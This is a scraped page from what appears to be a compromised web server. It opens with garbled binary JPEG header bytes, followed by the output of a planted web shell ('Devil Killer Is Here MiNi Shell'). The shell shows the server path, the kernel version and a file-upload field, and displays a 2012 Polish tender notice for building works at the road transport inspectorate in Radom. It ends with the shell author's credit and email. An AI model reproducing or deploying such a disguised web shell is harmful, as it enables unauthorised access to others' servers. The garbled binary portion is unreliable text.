JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120424/93231-N-2012.html

<p class="kh_header"><b>Radom: ROBOTY BUDOWLANE ZWIĄZANE Z REALIZACJĄ PROJEKTU POD NAZWĄ CENTRALNY OŚRODEK SZKOLENIA INSPEKCJI TRANSPORTU DROGOWEGO - REWITALIZACJA OBIEKTÓW WITD W RADOMIU</b><br>
<b>Numer ogłoszenia: 93231 - 2012; data zamieszczenia: 24.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Inspektorat Transportu Drogowego w Radomiu , ul.  Limanowskiego 29A, 26-610 Radom, woj. mazowieckie, tel. 48 363 51 87, faks 48 363 51 87.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ROBOTY BUDOWLANE ZWIĄZANE Z REALIZACJĄ PROJEKTU POD NAZWĄ CENTRALNY OŚRODEK SZKOLENIA INSPEKCJI TRANSPORTU DROGOWEGO - REWITALIZACJA OBIEKTÓW WITD W RADOMIU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ROBOTY BUDOWLANE ZWIĄZANE Z REALIZACJĄ PROJEKTU POD NAZWĄ CENTRALNY OŚRODEK SZKOLENIA INSPEKCJI TRANSPORTU DROGOWEGO - REWITALIZACJA OBIEKTÓW WITD W RADOMIU.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.00-7, 45.11.12.00-0, 45.22.31.00-0, 45.23.00.00-8, 45.26.23.00-4, 45.26.25.00-6, 45.31.00.00-3, 45.31.21.00-8, 45.32.00.00-6, 45.33.11.00-7, 45.33.11.10-0, 45.33.12.00-8, 45.33.20.00-3, 45.41.00.00-4, 45.42.11.00-7, 45.43.20.00-0, 45.44.21.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w następującej wysokości:128.747,00 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają doświadczenie w realizacji, minimum 2 robót budowlanych polegających na budowie lub przebudowie budynku, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, o wartości co najmniej 5.000.000,00 zł. brutto (słownie: pięć milionów złotych brutto) każda. Spełnienie warunku w tym zakresie nastąpi poprzez potwierdzenie wykonania roboty zgodnie z zasadami sztuki budowlanej i prawidłowo ukończonej. Dokumentem potwierdzającym ten stan może być dokument wystawiony przez odbiorcę wykonanej roboty, z którego wynikać będzie, iż robota została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona (np. referencja).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują lub będą dysponować osobami, które będą uczestniczyć w wykonywaniu zamówienia, o  kwalifikacjach zawodowych, doświadczeniu i wykształceniu niezbędnym do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności. Spełnienie tego warunku nastąpi poprzez wykazanie osób z uprawnieniami oraz  złożenie informacji o podstawie do dysponowania tymi osobami a także złożenie oświadczenia, że osoby wskazane do wykonywania zamówienia posiadają odpowiednie uprawnienia, tj:
a)	Co najmniej jedna osoba wskazana jako kierownik budowy, która posiada wymagane 
ustawą z dnia 07.07.1994 - Prawo budowlane   (Dz. U. z 2010 nr 243 poz. 1623)- zwanej dalej ustawą Prawo budowlane - uprawnienia przewidziane dla wykonywania samodzielnych funkcji technicznych w budownictwie w zakresie kierowania robotami budowlanymi o specjalności konstrukcyjno-budowlanej i minimum 5 letnie (licząc od daty uzyskania uprawnień) doświadczenie zawodowe w kierowaniu robotami budowlanymi, w zakres którego wchodziło również kierowanie wykonywaniem robót budowlanych stanowiących budowę przynajmniej jednego budynku o powierzchni użytkowej 3000 m2 lub większej;
b)	Co najmniej jedna osoba, wskazana do kierowania robotami budowlanymi branży sanitarnej, która posiada wymagane ustawą Prawo budowlane uprawnienia przewidziane 
dla wykonywania samodzielnych funkcji technicznych w budownictwie w zakresie kierowania robotami budowlanymi o specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, oraz minimum 5 letnie (licząc od daty uzyskania uprawnień) doświadczenie w kierowaniu robotami w ramach wskazanej specjalności, w zakres którego wchodziło również kierowanie robotami w zakresie wewnętrznych instalacji sanitarnych w obiekcie oraz w zakresie instalacji i urządzeń cieplnych;
c)	Co najmniej jedna osoba, wskazana do kierowania robotami budowlanymi 
branży elektrycznej, która posiada wymagane ustawą Prawo budowlane uprawnienia przewidziane dla wykonywania samodzielnych funkcji technicznych w budownictwie 
w zakresie kierowania robotami budowlanymi o specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektromagnetycznych, oraz minimum 5 letnie (licząc od daty uzyskania uprawnień) doświadczenie w kierowaniu robotami budowlanymi w ramach wskazanej specjalności, w zakres którego wchodziło również kierowanie robotami w zakresie wewnętrznych instalacji elektrycznych w obiekcie oraz w zakresie sieci elektrycznych.
d)	Co najmniej jedna osoba posiadająca  uprawniania do pełnienia nadzoru archeologicznego nad pracami ziemnymi prowadzonymi na terenie budowy, spełniające kryteria zawarte w Rozporządzeniu Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011r. w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanych do rejestru zabytków oraz badań archeologicznych, tj. osoba, która posiada tytuł zawodowy magistra uzyskany po ukończeniu wyższych studiów na kierunku archeologia oraz odbyła po ukończeniu tych studiów co najmniej 12 miesięczną praktykę zawodową w zakresie tych badań.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca potwierdzi Zamawiającemu spełnianie przynajmniej jednej z dwóch następujących okoliczności:
a)	Dysponuje lub będzie dysponował zdolnością finansową do wykonania niniejszego zamówienia, wynikającej z faktu posiadania środków finansowych w wysokości nie mniejszej niż równowartość 1 000 000 zł (słownie: jeden milion złotych);
b)	Dysponuje lub będzie dysponował zdolnością finansową do wykonania niniejszego zamówienia, wynikającymi z faktu posiadania zdolności kredytowej w wysokości nie mniejszej niż równowartość 1 000 000 zł (słownie: jeden milion złotych).
Spełnienie tego warunku nastąpi poprzez przedstawienie informacji z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy. Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej wymaganej przez Zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnienie opisanego przez Zamawiającego warunku.  
1.4	Sytuacji ekonomicznej tj.:
Za spełnienie tego warunku Zamawiający uzna dołączanie do oferty opłaconej polisy, a w przypadku jej braku innego dokumentu ubezpieczenia potwierdzającego, że Wykonawca  jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę minimum  2.000.000,00 PLN. 

2.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu na podstawie przepisów art. 24 ustawy.
3.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia oraz dołączenie dokumentów wymienionych w dziale 11 pkt.1 ppkt. 2,3,4,5,. 
4.	Zamawiający żąda wskazania przez Wykonawcę w formularzu oferty części zamówienia, których wykonanie powierzy podwykonawcy.
5.	Na potwierdzenie spełnienia warunków udziału w postępowaniu wszyscy wykonawcy muszą się wykazać dokumentami określonymi w dziale  11 SIWZ.
6.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki, o których mowa w dziale 7 pkt. 1.4 oraz pkt. 2 musi spełnić każdy z wykonawców. Warunki o których mowa w dziale 7 pkt. 1.1, 1.2 a-d oraz 1.3 wykonawcy mogą spełniać łącznie.
7.	Wykonawca w zakresie wskazanym przez Zamawiającego jest zobowiązany wykazać, nie później niż na dzień składania ofert spełnienie powyższych warunków.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Terminy wynikające z postanowień Umowy, w tym termin wskazany w § 6 ust. 1 Umowy mogą ulec zmianie w następujących przypadkach:
1.Zachodzić będzie konieczność wykonania robót budowlanych nie objętych Umową, których wykonanie stało się konieczne, na skutek sytuacji niemożliwej 
do przewidzenia przez Wykonawcę i Zamawiającego przed zawarciem Umowy, 
a wykonanie przedmiotu Umowy będzie uzależnione od uprzedniego wykonania tych robót
2Niezawinionych przez Wykonawcę opóźnień Zamawiającego w wykonaniu czynności, od których uzależniona jest możliwość wykonania obowiązków wynikających z Umowy, w szczególności opóźnień Zamawiającego w przekazaniu Wykonawcy Terenu budowy, opóźnień przystąpieniu do dokonania odbiorów robót, czy też opóźnień w przekazaniu Wykonawcy lub osobom trzecim stosownych dokumentów niezbędnych do realizacji Umowy
3Wstrzymania przez Zamawiającego robót objętych Umową zawieszenie terminów wynikających z Umowy, w szczególności z powodu opóźnienia, zawieszenia, wstrzymania lub zaprzestania przekazywania Zamawiającemu środków finansowych, przez ich dysponenta w ramach projektu, o którym mowa w § 1 Umowy
4Wstrzymania realizacji robót budowlanych przez właściwe organy administracji publicznej, np. dokonanie odkrywki archeologicznej, odkrycie niewybuchu, itp.,
5Wystąpienia Siły wyższej, przez którą na potrzeby niniejszego warunku należy rozumieć zdarzenie zewnętrzne wobec łączącej strony więzi prawne:
d.o charakterze niezależnym od stron,
e.którego nie można uniknąć ani któremu strony nie mogły zapobiec przy zachowaniu należytej staranności 
f.której nie można przypisać drugiej stronie.
Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne,  nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia
2Zmiany Umowy z przyczyn wskazanych w ust. 1 niniejszego paragrafu wymagają formy aneksu. Inicjatorem zmiany może być Wykonawca lub Zamawiający. Zmiana wymaga zgłoszenia w formie pisemnej w ciągu 4 dni od powzięcia informacji stanowiącej podstawę do wprowadzenia zmian. Zmiana ta spowoduje zmianę terminu wykonania prac i nie spowoduje zmiany wynagrodzenia wykonawcy. Zmiany zostaną wprowadzone w zakresie ustalonym negocjacjami Stron, z uwzględnieniem postanowień ust. 6  niniejszego paragrafu.
3Niezależnie od postanowień ust. 1 niniejszego paragrafu przewiduje się możliwość zmiany postanowień Umowy w przypadku:
1Zmiany powszechnie lub miejscowo obowiązujących przepisów prawa 
w zakresie mającym  istotny wpływ na realizacje Umowy
2Gdy konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych 
w umowach pomiędzy Zamawiającym a osobą trzecią w tym stroną umowy 
o realizację Projektu, o którym mowa w § 1 Umowy
3Konieczności wprowadzania projektów i rozwiązań zamiennych w trakcie realizacji inwestycji w stosunku do Dokumentacji projektowej, w sytuacji gdy dokumentacja projektowa zawiera błędy oraz zmiana jest niezbędna dla osiągnięcia optymalnych parametrów funkcjonalnych inwestycji. Ww konieczność, będzie rozumiana w szczególności jako skutek zaleceń lub nakazów organów administracji publicznej lub Nadzoru autorskiego Dokumentacji projektowej.
4Zmiany Umowy z przyczyn wskazanych w ust. 2 niniejszego paragrafu wymagają formy aneksu.  Zmiana wymaga zgłoszenia w formie pisemnej w ciągu 7 dni od powzięcia informacji stanowiącej podstawę do wprowadzenia zmian. Zmiana ta nie spowoduje zmiany wynagrodzenia wykonawcy.
5Zamawiający dopuszcza zamiany harmonogramu finansowo-rzeczowego. W miarę potrzeb oraz postępu robót Wykonawca zobowiązany jest do aktualizacji harmonogramu rzeczowo-finansowego. Wszystkie zmiany wymagają akceptacji Zamawiającego i nie wymagają formy aneksu.
6W przypadku konieczności zmiany terminów o których w ust. 1 niniejszego paragrafu Wykonawca zobowiązany jest przedłożyć Zamawiającemu dokumenty potwierdzając posiadanie ubezpieczenia oraz zabezpieczenia należytego wykonania umowy na przedłużony okres. Dokumenty należy przedstawić co najmniej na 7 dni przed upływem terminu wyznaczonego przez Zamawiającego do zmiany Umowy w tym zakresie chyba, że Zamawiający postanowi inaczej.
7Zamawiający dopuszcza zmiany osób o których mowa w § 8 ust. 1. Zmiany wymagają akceptacji Zamawiającego i  nie wymagają aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.mazowsze.witd.gov.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Limanowskiego 29a, 26-600 Radom.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.05.2012 godzina 10:00, miejsce: Wojewódzki Inspektorat Transportu Drogowego, ul. Limanowskiego 29a, 26-600 Radom, pok. nr 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 7.	Projekt jest współfinansowany ze środków  UE w ramach :
Przygotowania projektu indywidualnego w ramach Regionalnego Programu Operacyjnego Województwa Mazowieckiego 2007-2013
Priorytet V Wzmacnianie Roli Miast w Rozwoju Regionu
Działanie 5.2 Rewitalizacja Miast
dla projektu Centralny Ośrodek Szkolenia Inspekcji Transportu Drogowego-Rewitalizacja Obiektów WITD w Radomiu.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com